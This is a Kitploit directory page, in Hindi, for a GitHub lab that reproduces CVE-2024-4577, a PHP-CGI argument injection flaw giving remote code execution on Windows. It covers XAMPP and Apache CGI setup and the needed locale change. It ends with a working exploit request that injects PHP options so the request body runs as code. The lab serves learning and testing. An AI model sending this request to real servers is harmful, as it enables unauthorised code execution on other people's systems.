Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4577 — CVE-2024-4577 के लिए लैब बनाएं | Kitploit
उपकरण/GitHubGitHub/alpereny-cs/cve-2024-4577
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubalpereny-cs/cve-2024-4577

CVE-2024-4577

CVE-2024-4577 के लिए लैब बनाएं

रिपॉजिटरी देखें
212 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4577 - PHP-CGI आर्गुमेंट इंजेक्शन RCE

CVEविवरणCVSSv3
CVE-2024-4577PHP-CGI आर्गुमेंट इंजेक्शन भेद्यता9.8

"CVE-2024-4577 PHP में एक गंभीर आर्गुमेंट इंजेक्शन भेद्यता है जिसका शोषण करके दूरस्थ कोड निष्पादन (RCE) प्राप्त किया जा सकता है। DEVCORE के शोधकर्ताओं के अनुसार, यह दोष कैरेक्टर एन्कोडिंग रूपांतरणों में त्रुटियों का परिणाम है, जो विंडोज़ पर “Best Fit” सुविधा को प्रभावित करता है।"
-Tenable

CVE-2024-4577 के लिए प्रयोगशाला बनाएं

XAMPP डाउनलोड करें

डाउनलोड करें XAMPP (8.1.25 / PHP 8.1.25) XAMPP स्थापित करने के बाद, php संस्करण जांचें। यह 8.1.25 होना चाहिए। php संस्करण को कमांड लाइन से "php -v" कमांड चलाकर जांचा जा सकता है। यदि यह त्रुटि देता है, तो इसे php PATH वेरिएबल में जोड़ा जाना चाहिए।

लोकेल सेट करें

लोकेल बदलने की आवश्यकता है। ऐसा करने के लिए, Control Panel > Clock and Region > Region पर जाएं। प्रारूप को Japanese, Traditional Chinese, या Simplified Chinese पर सेट करें। Administrative > Change system locale पर क्लिक करें और उपयुक्त लोकेल चुनें।

Apache कॉन्फ़िगर करना

यदि PHP cgi मोड में नहीं चलता है, तो आपको ये सेटिंग्स करनी चाहिए।

  • php.exe या php-cgi.exe को /cgi/bin/ फ़ोल्डर में कॉपी करें।
  • इन पंक्तियों को \xampp\apache\conf\httpd.conf में जोड़ें ⬇️
root@kitploit:~
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php

<Directory "C:/xampp/php">
    Options +ExecCGI
    AllowOverride None
    Require all granted
</Directory>
  • httpd-xampp.conf पर जाएं और LoadModule php_module "C:/xampp/php/php8apache2_4.dll" खोजें। पंक्ति की शुरुआत में '#' लगाएं।

Apache शुरू करें

परिवर्तनों को सहेजें और apache इंस्टेंस शुरू करें।

शोषण

यदि नीचे दिए गए POST अनुरोध के बॉडी में भेजे गए PHP कोड का आउटपुट प्रतिक्रिया में दिखाई देता है, तो शोषण चरण सफल होता है।

root@kitploit:~
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
echo "vulnerable";
?>

अस्वीकरण⚠️

यह प्रयोगशाला वातावरण केवल शैक्षिक उद्देश्यों के लिए है और इसे लाइव वातावरण में उपयोग नहीं किया जाना चाहिए। अनुचित उपयोग के परिणामस्वरूप होने वाली किसी भी क्षति या हानि के लिए मैं जिम्मेदार नहीं हूं। उपयोगकर्ताओं को इस वातावरण का उपयोग अपने जोखिम पर करना चाहिए।

टूल डाउनलोड करें